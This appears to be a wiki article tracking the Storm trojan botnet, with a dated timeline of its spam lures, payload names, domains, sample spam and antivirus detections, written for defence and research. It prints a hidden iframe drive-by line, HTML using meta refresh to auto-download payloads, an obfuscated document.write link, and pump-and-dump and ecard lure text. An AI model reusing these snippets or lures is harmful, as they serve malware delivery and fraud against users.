Storm

Introduction[]

The Storm trojan is many things. It is arguably a worm, a trojan, malware, the unit element of a botnet, a hijacked host program, a spam sender, a directory harvester, an http website redirector, a member of a DDoS attack force, a zombie. It is spread by spam messages which can be sent from machines infected with Storm itself. The spammed message may contain a link to a hijacked host web site or web site proxy which is also running on Storm. The hijacked host may contain an attractive file to be downloaded, which once again contains the Storm infection.

Storm is unique in its ability to perform so many functions. As at December 2007, it is the most pervasive and most successful implementation of a multifunctional infection that the Internet has ever witnessed. Its capabilities to exert control and domination of key sectors of the Internet are unprecedented. Storm is too great a threat to be ignored.

Estimates by researchers for the number of Windows machines infected range from 2 million minimum up to 50 million. The scanner used in Botnet Reporting usually accumulates 3,500 - 4,000 hijacked IPs being actively used to host the distribution of Storm in any 24 hour period. The ISPs that are the most infected are located in the US

SBC Global (pacbell, swbell, ameritech, snet)
Comcast
Roadrunner (rr)

These three ISPs alone account for over 20% of the world's Storm distribution network.

The geographical distribution of Storm hosting sites for the top 10 countries is shown in the chart on the right, click to enlarge. It shows the accumulated host IPs from October 2007 to April 2008.

Images[]

A list of infected machines used in botnets to host spammed sites, including the storm trojan itself, can be found in the spamtrackers download area for botnets.

Games variant	Greetings variant	Krackin variant	Halloween variant 2007
HPGI pump-and-dump variant 1	CYHA pump-and-dump variant 2	CYHA pump-and-dump variant 3	FAVE stock pump 4a (Dec 15)
BSGC stock pump 4b	BSGC stock pump 5b	BSGC stock pump 5c	Dec 28 2007 variant
FAVE stock pump 4b (Jan 2)	FAVE stock pump 4c (Jan 4 2008)	FAVE stock pump 4d (Jan 31)	Hearts (Jan 16)
Hearts-2 (Jan 31)	Valentine-2.gif (Feb 11)	Valentine-5.gif (Feb 11)	Valentine-4.gifg (Feb 11)
Valentine-3.gif (Feb 11)	Valentine-1.gif (Feb 11)	Valentine-7.gif (Feb 11)	Valentine-6.gif (Feb 11)
Valentine-8.gif (Feb 11)	Mar 3	Apr 1	Blogspot redirection (Apr 6)
Storm Codec (Apr 9)	Storm Love RIddles Jun 1	Storm China Earthquake Jun 18	Storm Loveletter Jun 28
Storm Codec (Apr 9)	Storm Amero coin (Jul 21)	Storm FBI vs. Facebook (Jul 29)	Storm msnbc campaign (Aug 14)
Storm CNN campaign (Aug 14)	January 2009 ecard site (Jan 1, 2009)	Waledac Obama website spoof (January 17)	Waledac Waledac Valentine's Day theme (Jan/Feb 2009
Waledac Valentine Puppies (February 9, 2009)	Waledac New Years (December 31, 2009) \|\|

Sample Spam[]

Received: from wbmdos (unknown[59.24.160.53]) by example.net (exin02) with SMTP
         id <2007101005045710700k7imqe>; Wed, 10 Oct 2007 05:05:55 +0000
X-Originating-IP: [59.24.160.53]
Received: from bngq ([33.223.57.69]) by wbmdos with Microsoft SMTPSVC(5.0.2195.5329); Wed, 10 Oct 2007 14:05:44 +0900
Message-ID: <470D7DA3.7060302@fnblondonky.com>
Date: Wed, 10 Oct 2007 14:05:44 +0900
From: <nternet@fnblondonky.com>
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: example@example.net
Subject: come get it
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Free games, What more do we need to say? http://76.180.***.***/

In this example, it is possible that the sending IP address, 59.24.160.53 was infected with Storm, and that it was Storm that sent it. It is definite that the web site IP, 76.180.***.*** was a distributer of Storm. The site at the address is designed to attract younger Internet users: previously it was offering a tempting 1,000 different Arcade games for free at the click of an icon, and now it masquerades as a greetings club with a funny kitten animation.

If we look at the links on that page, we discover that every link is for the same file, which in this case is the Storm trojan itself:

Also known as[]

The Wikipedia lists various names for this trojan -

CME-711 (MITRE)
W32/Nuwar@MM and Downloader-BAI (specific variant) (McAfee)
Troj/Dorf and Mal/Dorf (Sophos)
Trojan-Downloader.Win32.Small.dam
Trojan.DL.Tibs.Gen!Pac13 ("FSEC")
Trojan.Downloader-647
Trojan.Peacomm (Symantec)
TROJ_SMALL.EDW (Trend Micro)
Win32/Nuwar (ESET)
Win32/Nuwar.N@MM!CME-711 (Windows Live OneCare)
W32/Zhelatin (F-Secure and Kaspersky)
Trojan.Peed, Trojan.Tibs (BitDefender)

Multi AV scan of happy2008.exe - Scan taken on 26 Dec 2007

AntiVir - Found WORM/Zhelatin.ob
Authentium - W32/StormWorm.P
AVG Antivirus - Found Downloader.Tibs
BitDefender - Found Trojan.Peed.IRE
Dr.Web - Found Trojan.Packed.263
eTrust-Vet - Win32/Sintun.AT
F-Prot Antivirus - Found W32/StormWorm.P
F-Secure Anti-Virus - Found Packed.Win32.Tibs.gu
Kaspersky Anti-Virus - Found Packed.Win32.Tibs.gu
Microsoft - Trojan:Win32/Tibs.gen!ldr
Prevx1 - Stormy:Worm-All Variants
Sophos Antivirus - Found Mal/Dorf-C
Symantec - Trojan.Peacomm.D
Webwasher-Gateway - Worm.Zhelatin.ob

Removal[]

In September 2007, Microsoft added detection and removal of Storm in its Malicious Software Removal Tool which was included in the Windows Automatic Update package. On September 25th, Microsoft announced that MSRT may have helped reduce the size of the Storm botnet by up to 20%. The new patch, as claimed by Microsoft, removed Storm from approximately 274,372 infected systems out of 2.6 million scanned Windows systems. However, according to senior security staff at Microsoft, "the 180,000+ additional machines that have been cleaned by MSRT since the first day are likely to be home user machines that were not notably incorporated into the daily operation of the 'Storm' botnet," indicating that the MSRT cleaning may have been symbolic at best. Source

Removal instructions vary by Antivirus vendor.

For Symantec, it is at the Storm write-up page

For McAfee you need to be at the latest levels.

For F-Secure you need to be at the latest level.

Microsoft provides a Malicious Software Removal Tool (MSRT) which removes the Storm infection.

Storm / Zhelatin timeline[]

Feb 2007 - April 2007[]

In a series of social engineering releases designed to infect multiple different target sectors, this worm has appeared under many different forms. Target sectors include children, people intrigued by whimsical greeting cards, sports fanatics, the security conscious, people seeking love, people intrigued by war, news watchers, people who like to offer help, problem solvers, volunteers, game players, gamblers, etc. By varying the offering in each wave of spam, the perpetrator has sought to maximize the infection rate among the target victims.

The timeline of spam attacks illustrating the different target sectors is shown below.

February 11, 2007

Storm worm was being spread over Instant Messenger services

LOL ;-)
http://***.***.***.***/ag.***(active now)

February 14

Zhelatin variant uses the Valentines Day in mail subjects such as

Valentines Day Dance
The Valentines Angel
Valentines Day is here again
Valentine’s Love
Valentine’s Night
Valentine Letter
Your Love on Valentine’s

Payloads: Flash Postcard.exe flash postcard.exe greeting postcard.exe Greeting Postcard.exe greeting card.exe Greeting Card.exe postcard.exe Postcard.exe

April 9

World War III between USA and Iran, subjects such as

USA Missle Strike: Iran War just have started
Israel Just Have Started World War I II
Iran Just Have Started World War III
USA Just Have Started World War III
Missle Strike: The USA kills more then 20000 Iranian citizens

Payloads: "News.exe" , "Movie.exe" , "Read_Me.exe" , "Click_Me.exe" , "Video.exe" , "Read_More.exe"

April 12

The lovers' worm, with subjects like

A Toast My Love
A Token of My Love
Come Dance with Me
Come Relax with Me
Destiny
Dream of You
Eternal Love
Eternity of Your Love

Payloads included Love Card.exe Love Postcard.exe My Love.exe Postcard.exe

April 13

Bogus virus or worm alert, with subjects like

Worm Alert!
Worm Detected!
Virus Alert!
Virus Activity Detected!

Payloads added a random variable this time

patch-[Random 4 digits].zip
removal-[Random 5 digits].zip
hotfix-[Random 5 digits].zip
bugfix-[Random 5 digits].zip

June 2007 - August 2007[]

June 16

Greetings on .hk domains - the body had many different .hk domains links. Subjects were typically

For You....My Love

Gday
Gday, Bud
Gday, Pal
Good day!
Hello
Hello, Bud

Payload: fun.exe (also some MS exploits in the web page)

June 22

Greeting cards from a friend

You've received a postcard from a family member!
Your family member has sent you a postcard from greetingcards.com.
You've received a greeting card from a friend!
You've received a greeting postcard from a worshipper!

Payload: ecard.exe

July 8

They masquerade as malware patches. The title of these spams are used such as "Trojan Detected!"

Payload: patch.exe

August 15

"msdataaccess.exe".

The spams are as the following: Subject: XXX e-card (XXX such as Birthday, Musical)

August 21

When some follows the link in the spams, it shows that you need to have Secure Login Applet installed on your computer. The payload is called "applet.exe"

The subjects of spams are as the following:

Dated Confirmation
Internal Support
Internal Verification
Login Verification
Membership Details
New Member Confirmation
Registration Confirmation
User Services

August 25

It masquerades as ecard as usual. The subjects of spams are as shown here:

b A card for you
Here is your E-greeting
Someone sent you an Ecard
This is for you
You have a new eCard from...?
You have received an eCard

The link in the body of the text changed from an IP (http://***.***.***.***) to a name (http://example.com)

August 26

Zhelatin begins spamming with YouTube video now.

The subjects of spams may be as the following:

are you kidding me? lol
Dude your gonna get caught, lol
Dude, what if your wife finds this?
man, who filmed this thing?
HAHAHAHAHAHA, man your insane!

Payload = "video.exe"

August 29

The subjects used include

Could you give us a hand?
Could you give us your opinion?" ,
Put in your two cents
We could use your help

Payload = "setup.exe"

August 30

The subjects of spams:

Cool Video is out
dude this is not even on MTV yet
Hot new video
OMG, check out the new video
this video is not out yet
this video rocks
your gonna love this, lol

If the video does not start playing, you need to looad the right codec. Click on the link to install it.

Payload = "codec.exe"

September 2007 - December 2007[]

September 14

Storm Trojan adopted a Football theme by offering a "game tracking system":

Are you ready for football season?
Are you ready for some football?
Do you have your NFL Game List?
Football Fan Essentials
Football Season Is Here!
FOOTBALL! Are You ready?
Free NFL Game Tracker

Payload: tracker.exe

September 17

Spreading with 1000+ free games as the attraction. The spams used subjects such as

1000+ Free Games!
GAMES! GAMES!
Stop paying for games
Thousands of hours of fun, for free
Play all your favorite games for free
Wow, cool games!

Payload = "ArcadeWorld.exe"

October 12

The laughing psycho kitty cat ecard. The subjects include

Someone is thinking of you! Open your ecard!
We have a ecard greeting for you.
We have a ecard surprise!

Payload = SuperLaugh.exe

October 17

The krackin site, with sample spam varies, but the web site purports to provide virus protection and IP blocking. The target audience is the security conscious user.

All the new movies music and more. In one place. The Krackin network.
http://***.***.***.***

Payload: krackin.exe

October 28

The Halloween version, where the target audience is the seasonal fun lover. Typical subjects include

Make him dance
Man this is funny
To much fun

Sample spam -

The Dancing Skeleton

Do You Want To See New Funny Sexual Helloween Game with Dancing Skeleton? Just Click Here
Via Email, MSN, or IRC

Payload: halloween.exe or dancer.exe

November 12

A pump-and-dump scam was loaded onto the Storm hosting bots, replacing the existing payload. At URL http://xxx.xxx.xxx.xxx/stock.html it contained

Global Economy Newsletter

Hemisphere Gold Inc. (HPGI)
Current: $1.00
Market Alert - Strong Buy

Gold investors find safe haven as the US Dollar continues to drop throughout 2007.

Market Status:

Since 2006 market annalists predicted gold to hit $800 per ounce within two years. Gold has hit $812 an ounce
just one year later due to depleted gold supplies and a falling US Dollar.

In an effort to find more gold, recent findings of large Gold deposits in Suriname has turned this small
country into a modern day gold rush.

Hemisphere Finds Gold!

Hemisphere Gold.s Properties are sitting right in the middle of the largest gold mines in the region and
advanced exploration has already found gold deposits as high as 3.55 ounces/ton. This region has already
become know as the Gold Belt.

6 Reasons To Own HPGI

1: Gold is on a Bull Run, climbing over $200 an ounce in just 9 months.
2: Gold demand is at record highs and is expected to continue increasing.
3: Hemisphere has the cutting edge technology and financial team to take this all the way.
4: Hemispheres property sits right in the middle of the Gold Belt where over 50 million ounces of gold have
already been extracted.
5: Recent findings have pushed share prices up over 120% in the last 30 days.
6: Gold is a traditional safe haven for investors in times of trouble as it keeps its value greater than
currency.

Hemisphere is launching a full scale marketing campaign with coverage already found on sites like
Stockguru.com. With huge results already confirmed HPGI is moving into the final stages of exploration. This
leaves nothing left but mining a large deposits in a primed market. HPGI should be on the top of your list
for your next investment consideration.

November 18

The payload (dancer.exe) has generally been removed, so that clicking on the Download area produces

404 Not Found
nginx/0.5.17

However, the site contains a malicious "iframe" exploit in its code:

<iframe src="/cgi-bin/in.cgi?p=user1" width="0" height="0"></iframe>

This exploit is analyzed at the disog.org site and described at this blogspot.

This same iframe injection has also been found on general web sites as a "drive-by" installation.

November 26

The storm host machines returned only a blank page. Attempts to load any pages - such as /stock.html - returned a "page not found" condition:

404 Not Found
nginx/0.5.17

December 11

The current payload on the Storm site servers is the file "sony.exe" which McAfee identifies as Nuwar@MM

It contains the following trojan fingerprints within its code:

Software\Microsoft\Windows\CurrentVersion\Run���noskrnl.exe
noskrnl.config

These fingerprints are covered in the Symantec Technical description of this trojan.

The trojan code can be viewed safely without downloading. You can search for the fingerprint string noskrnl.config to verify that it is the Storm infection.

December 12/13

The image file installed on the hosts has a pump-and-dump Securities fraud scam pushing Pink Sheets stock CYHA (Cyberhand Technologies)

December 14

The image file is replaced with two alternative files pumping two stocks FAVE and BSGC.

FAVE is listed in a press release as Simulated Environment Concepts, Inc. (PINKSHEETS: FAVE). The company web site is http://www.spacapsule.com/

Press Contact: IR Complete, Inc. 919-468-4511

BSGC is Big String Corporation, mentioned in a November Penny Investor listing as a #1 pick. The company web site is at http://www.bigstring.com

http://finance.yahoo.com/q/bc?s=BSGC.OB&t=3m

December 24

The Christmas lure is a predictable ploy - a fake greeting card. Typical subject lines:

Merry Christmas To All
Warm Up this Christmas
Mrs. Clause Is Out Tonight!
The Twelve Girls Of Christmas
Jingle Bells, Jingle Bells
Cold Winter Nights

.. sent you an e-card from our Free Electronic Card Service.
To view your customized greeting card, simply click on the following Internet location
http://www.americangreetings.b719.cn/[whatever]
Regards Webmaster

Winter can be cold. I bet you could use a little something to warm you
up. Take 2 min out of your day. You wont regret it. ;-)
http://merrychristmasdude.com/

Payloads: happy2008.exe and sony.exe

December 26

Post Christmas Storm spams portray a New Year theme. Subjects include

Opportunities for the new year
Message for new year
New Year wishes for you
Blasting new year
It’s the new Year
Joyous new year
New Hope and New Beginnings

Typical URLs:

uhavepostcard.com
happycards2008.com
newyearcards2008.com
newyearwithlove.com
familypostcards2008.com

Payloads: "happy2008.exe" "happy-2008.exe" "happynewyear2008.exe" "happynewyear.exe" "stripshow.exe" "happy_2008.exe"

The link to the site name is obfuscated:

document.write( unescape(
'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E' ) );

Domain names are now being registered in Russia with a bank of name servers and the usual fast-flux behavior

 Domain Name: HAPPYCARDS2008.COM
 Registrar: ANO REGIONAL NETWORK INFORMATION CENTER DBA RU
 Whois Server: whois.nic.ru
 Referral URL: http://www.nic.ru
 Name Server: NS.HAPPYCARDS2008.COM
 Name Server: NS2.HAPPYCARDS2008.COM
 Name Server: NS3.HAPPYCARDS2008.COM
 Name Server: NS4.HAPPYCARDS2008.COM
 Name Server: NS5.HAPPYCARDS2008.COM
 Name Server: NS6.HAPPYCARDS2008.COM
 Name Server: NS7.HAPPYCARDS2008.COM
 Name Server: NS8.HAPPYCARDS2008.COM
 Name Server: NS9.HAPPYCARDS2008.COM
 Name Server: NS10.HAPPYCARDS2008.COM
 Name Server: NS11.HAPPYCARDS2008.COM
 Name Server: NS12.HAPPYCARDS2008.COM
 Name Server: NS13.HAPPYCARDS2008.COM
 Status: clientTransferProhibited
 Updated Date: 26-dec-2007
 Creation Date: 26-dec-2007
 Expiration Date: 26-dec-2008

December 29

Additional name servers added

freshcards2008.com
familypostcards2008.com
merrychristmasdude.com
newscorpalerts.com
happy2008toyou.com
happysantacards.com
hellosanta2008.com
hohoho2008.com
parentscards.com
postcards-2008.com
santapcards.com
santawishes2008.com

January 2008 - March 2008[]

January 9, 2008

For a short time the storm network was used in a phishing operation aimed at the banks of Halifax and Barclays. Fake domain names registered were i-halifax.com and i-barclays.com.

January 10

The suspension of the domain names used to resolve the 0 refresh fast-flux addresses were all suspended by the registrars in a synchronized move. Only existing infected machines were able to join the network, and new infections were effectively unable to locate any other network members. Any infected machine that was restarted would be likely to fail to reconnect. It is expected that this will result in a major reduction of bots within the standard 48 hour Internet caching period.

January 16

Spamming resumed using a raw IP address. Title line is With Love!.

Payload file withlove.exe or with_love.exe was in an obfuscated Java script:

January 31 Sample spam contents

Subject: You won't spend to much for these meds!
Dreams can cost less here! http://91.122.38.100/xfj/

The IP address in the spam corresponds to a Storm infected machine. By repeatedly loading the same URL of that or any other Storm IP with /xfj/ appended (chosen at random) you find redirections to exactly 8 Canadian Pharmacy sites:

andconsider.com
bringinstrument.com
endscience.com
measureremember.com
owndeep.com
speakpound.com
tellthrough.com
thanpopulate.com

Canadian Pharmacy sites are in turn hosted on another fast-flux botnet. Different randomly selected subdirectory names yield the same result.

Geographic fingerprinting reveals completely different topologies for these two botnets.

The geo-print for Storm is seen under the topic Botnet hosting at and for Canadian Pharmacy at File:Bot PUF.jpg.

February 7 The infected page was changed to contain obfuscated code

February 10 Redirections from Storm infections to fake Canadian Pharmacy sites

interestquiet.com
chickher.com
byoperate.com
elementgrand.com
tenpitch.com
roundtoward.com
twoinstant.com

February 11 Eight new images were introduced with a Valentines theme. There is a more direct load of the virus payload (valentine.exe) using "refresh" to ensure a higher infection rate:

<html xmlns="http://www.w3.org/1999/xhtml">  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta http-equiv="refresh" content="5;url=valentine.exe">
<title>Your Valentine</title>
<body>
<center>
<a href="valentine.exe"><img border=0 src="5.gif"><br></a>

</body>
</html>

The random gif with the unconvincing pump and dump stock scam has been removed.

Domain names used to serve the 0-fast-flux network:

moonstarfood.com (removed)
destroythemoon.com (removed)

Name servers were on

ns.llldddnnn.com 76.212.174.58
ns2.llldddnnn.com 68.252.56.21
ns3.llldddnnn.com 64.221.169.181
ns4.llldddnnn.com 75.132.160.97
ns5.llldddnnn.com 68.184.51.232
ns6.llldddnnn.com 80.197.35.241
ns7.llldddnnn.com 90.150.141.112
ns8.llldddnnn.com 78.8.106.11
ns9.llldddnnn.com 59.31.54.198
ns10.llldddnnn.com 60.53.245.92
ns11.llldddnnn.com 98.206.242.41
ns12.llldddnnn.com 76.97.95.128
ns13.llldddnnn.com 24.98.214.216

February 14 Current Canadian Pharmacy redirections for Storm ngnx/0.5.17 URLs in the format http://xxx.xxx.xxx.xxx/junk/

chancetoo.com
enoughbreak.com
gonebox.com
largespeech.com
planepound.com
quickwant.com
safecause.com

They have still removed the randomized gif for a pump-and-dump stock which was previously loaded with a URL in the format http://xxx.xxx.xxx.xxx/junk.gif

March 3 The image changed to a "FunnyPostCard" lure. The payload was ecard.exe and a download is attempted even if the victim does not click on the image, by using an http refresh

<meta http-equiv="Refresh" content="5; URL=ecard.exe">

Redirection sites for Canadian Pharmacy and Cheap Drugs Online Store

picksuch.com
wonderright.com
fallbroad.com
pharmapillsforu.com
rxpills4u.com
cheapestpillshere.com
ranglad.com
speakplant.com

March 4 A new wave of spams that repeat an earlier phase of Storm propagation via fake greeting cards

Subject:

Your ecard joke is waiting
You have an ecard
We have a ecard surprise
Someone Just sent you an ecard
Did you open your ecard yet
ecard waiting for you
Open your ecard
new ecard waiting
Now this is funny
online greeting waiting
sent you an ecard

Body:

laughing Funny Card
You have been sent a Funny Postcard
You have been sent the Funny Ecard
original Funny Card
Someone Sent you this Funny Ecard
your funny postcard
original Funny Postcard
sent a Funny Postcard
personal funny postcard
FunnyPostcard
laughing funny postcard

March 20 The domain name used to interconnect Storm sites was ibank-halifax.com registered with Russian company ANO REGIONAL NETWORK INFORMATION CENTER. On March 18, 2008 it was suspended

Status: clientHold
Status: clientTransferProhibited

However, existing Storm hosts were still performing redirections to spam sites registered with Xin Net:

ED Express
- surfpart.com
- darksidehq.com
- superwildside.com
- twinsideauto.com
Pharmacy Express
- daysidehomes.com
- sideeventsonline.com
- flipsidesite.com
United ED Meds
- esideeffect.com

All of these sites loaded their images from the one Image Server - oleroneg.info (Sponsoring Registrar: Blog.com Digital Communications Inc.)

March 31 The latest edition had an April Fool's Day theme. The picture is of a jester with the placard "April Fool" and trailing a slogan "Kick me hard" Sample subject lines were

All Fools' Day
Doh! All's Fool.
Doh! April's Fool.
Gotcha!
Surprise! The joke's on you.

Payloads included funny.exe, foolsday.exe, kickme.exe

April 2008 - July 2008[]

April 6 Google blogspot's much abused redirection was used to draw victims into infected distribution sites. Spammed links in the form of http://some-name.blogspot.com would redirect with an "http refresh" to an infection site.

April 9

Datum: Tue, 8 Apr 2008 22:59:22 -0400   
Subject: With all my love
   
I Love Being In Love With You  http://supersameas.com/

Payload = StormCodec8.exe and StormCodec.exe

April 14 Spams linking to a variety of websites owned by innocent parties for either a file called "redir.html" which links to a sugaronly.com, a Canadian Pharmacy scam pharma site, or a file called "video.exe" which is the Storm Worm download. All sites have both files though usually only one is spammed.

Sample spam:

Hello, make a wise decision,  get your meds from the most reliable provider.
http://www.google.it/pagead/iclk?sa=l&ai=USRUkh&num=28816&[line break inserted]
  adurl=http://justleopold.com/redir.html
Coupon #9FQN
guthrey jael

Substituting "video.exe" for "redir.html" on justleopold.com will attempt to download Storm Worm on your computer.

May 19

Infections by email use IP addresses, to conceal the domain names from research and removal

Subject: Missing you with every breath
The Mood for Love http://xxx.x.xx.64/

Subject: I Knew I Loved You
You & Me http://xxx.xxx.xxx.102/

Payload = iloveyou.exe loveyou.exe

Adding any subdirectory causes a redirection (http://xxx.x.xx.64/blah/) to

catsharp.com *
followequate.com [client hold by Xin Net, May 28]
lowsmell.com *
picturewest.com *
posestory.com *
printlength.com *
producemorning.com *
pressrose.com *
industrydictionary.com

which are Canadian Pharmacy brands.
* means these run on a fast-flux botnet of 20 IP addresses, refreshing every 2 minutes.

June 1

Sample spam:

Subject: You have touched my heart

Missing you http://xxx.xx.xx.73/

The page source contains

<html>
<head>
<title>Who is loving you?</title>
</head>
<body>
<center><img src="lr.gif"><br>
Who is loving you? Do you want to know? 
Just <a href="loveyou.exe">click here</a> and choose either "Open" or "Run".

</body>
</html>

The payload is loveyou.exe

June 18

Short emails using an IP based URL (http://xxx.xxx.xxx.xxx) with a theme of the China Earthquake and sometimes mention of the Beijing Olympics. The click-through shows a page with a black screen promising a video. Clicking to see the video installs the Storm infection.

Sampled from the subject lines:

2008 Olympic Games are under the threat
A new powerful disaster in China
A new deadly catastrophe in China
China is paralyzed by new earthquake

Payload: beijing.exe

June 25 Storm is sending both the "China disaster" story as well as a seemingly incompetent email with a reply address

Hello, my friend.

Do you want to buy any stuff: any kind of pills, oem software, cool porn?
Just mail me back, i'll find the best offer for you.

My Email: gpdude22@yahoo.com

The imbedded Email addresses vary

cstygstra@gmail.com
gpdude22@yahoo.com
infrared35@gmail.com
jim@tegelaar.com
wagz_is_god@yahoo.com

This may be a "Joe-job" designes to tarnish the reputation of those people.

June 29 Sample message:

> Date: Sun, 29 Jun 2008 01:32:24 +0900
> From: xxxxx@xxxxx.xxx
> Subject: You make my world special
 -
> My heart belongs to you http://latinlovesite.com/

Known domains

latinlovesite.com
makinglovedirect.com
theloveparade.com
yourloveletter.com
youronlinelove.com
lollypopycandy.com (used as a name server)
verynicebank.com (used as a name server)

Payload = winner.exe mylove.exe

July 4

Storm worm themes frequently correlate with seasonal holidays, specifically those celebrated in the U.S. July 4th is Independence Day in the U.S., and a major holiday. Storm sites display a faux-video image with fireworks. The message on the sites is "Colorful Independence Day events have already started throughout the country. The largest firework happens on the last weekday before the Fourth of July. Unprecedented sum of money was spent on this fabulous show. If you want to see the best Independence Day firework just click on the video and run it."

It is interesting to note that storm sites do not mark major holidays not observed in the U.S., like Guy Fawkes Day, May Day, International Women's Day, or Bastille Day, nor are they fooled by U.S. public holidays like Labor Day whose significance among the general public is mostly limited to being a day off work. It suggests the involvement of someone who has at least lived for some time in the U.S. But clumsy English usage, like "firework" used in the singular or "stars and strips (sic) forever," suggests a non-native speaker is writing the subject headings and body messages, as well as the messages included on the sites themselves.

The spam has links to infected IP addresses, not domain names. All storm infected servers display the same image, not just the ones with fixed IP addresses which are included in spam. Subject headings and bodies include

Amazing firework 2008
Amazing Independence Day show
America for You and Me
America the Beautiful
American Independence Day
Bright and joyful Fourth of July
Celebrate Independence
Celebrating Fourth of July
Celebrating the Glory of our Nation
Celebrating the spirit of our Country
Celebrations have already begun
Fabulous Independence Day firework
God bless America
Happy Birthday, America!
Happy Fourth of July
Happy Independence Day
Happy Independence Day!!
Independence Day firework broke all records
Light up the sky
Sparkling Celebration of Independence Day
Spectacular fireworks show
Stars and Strips forever
Super 4th!
The best of 4th of July Salute
The best firework you've ever seen
Time for Fireworks
Well done 4th!
Wish your friends a happy Independence Day

Payload=fireworks.exe
(Whoever chose the name for the payload apparently is aware that "fireworks" is always plural.)

July 21

The U.S. Government began to realize the plan to replace the Dollar with the
"Amero", the new currency of the North American Currency Union. Canada, the
United States of America and Mexico have resolved to unit in order to resist
the Worldwide Financial Crysis. You can become acquainted with the plan of
the implementation of Amero, just click on the icon under this text.

Payload = amero.exe

The Amero image is also found at http://signaveritae.wordpress.com/2008/01/09/our-failing-dollar/

July 29

Storm spam arrives with subject headings about the FBI spying on Facebook users. (It goes nearly unnoticed in the midst of a deluge of spam linking to trojan downloads on hacked websites; those spams carry similar subject lines consisting of inflammatory news headlines.)

Subject: The F.B.I.'s plan to "profile" Facebook

FBI may strike Facebook http://SmartNewsRadio.com/

Other possible lines used as subjects or body text include

F.B.I. can watch our conversation through Facebook
F.B.I. tries to fight Facebook
FBI Watching Possible Terrorists on Facebook
FBI Watching Hezbollah in Facebook
FBI bypasses Facebook to nail you
The F.B.I. has a new way of tracking Facebook

Payload = fbi_facebook.exe

Gary Warner has a more extensive listing on his blog page

Obviously, people who visit one of those infected sites and download storm on their computers will have someone spying on them, but it won't be the FBI.

August 2008 - December 2008[]

August 14

Targeting followers of headline news stories, the Storm Trojan team sent millions of emails with catchy headlines, secretly diverting users who clicked on the "msnbc" or "CNN" link to a decoy site. The click on a newslink downloaded the Storm trojan. For example, the payload would be masquerading as an upgrade to Adobe Flash player, adobe_flash.exe. 13 out of 20 antivirus companies identified it as Storm. For example:

 F-Secure Anti-Virus  	Found Email-Worm:W32/Zhelatin.YH, Trojan-Downloader.Win32.Exchanger.nb

January 2009 -[]

January 1

Are there still people willing to click on ecards? Someone thinks so. The malware no longer is detected as "storm"/tibs/zhelatin/zhelatin, but as "walezof," a distinct maleware entity.

Why are we including it here? Beyond the "ecard" theme, the similarities in the botnet hosting are strong: These domains use a single seat botnet with zero second refresh. Storm had been the only botnet we'd observed with that pattern. Analysts at Shadowserver report it uses a similar peer-to-peer network, as well. It's either being distributed by the same criminals or else by a very ardent admirer.

The ultimate smoking gun would be to find one of the old surviving storm domains now display the same content or are on the same botnet, but those domains now refuse connections altogether (rather than displaying different content) and they are not on a fast flux botnet at all.

January 17

Waledac's similarities to Storm continue. Storm previously tried to lure people into clicking with fake sites offering news about some catastrophic disaster; now it's a spoof of Barack Obama's campaign website with a fake news item claiming he is refusing to assume office next week. Like storm, all the previous domains with ecard themed names have also begun displaying the Obama theme.

Payloads:

president.exe obama.exe statement.exe baracknews.exe obamanews.exe barack.exe barackspeech.exe barackblog.exe obamablog.exe obamaspeech.exe usa.exe news.exe speech.exe blog.exe love.exe youandme.exe onlyme.exe onlyyou.exe you.exe video.exe readme.exe postcard.exe pdf.exe doc.exe file.exe

January 25 Waledac assumes a Valentines theme, though not a lot of spam is arriving in the US. It changes to a puppy dog Valentine theme on February 9, but still only there if you go looking for it.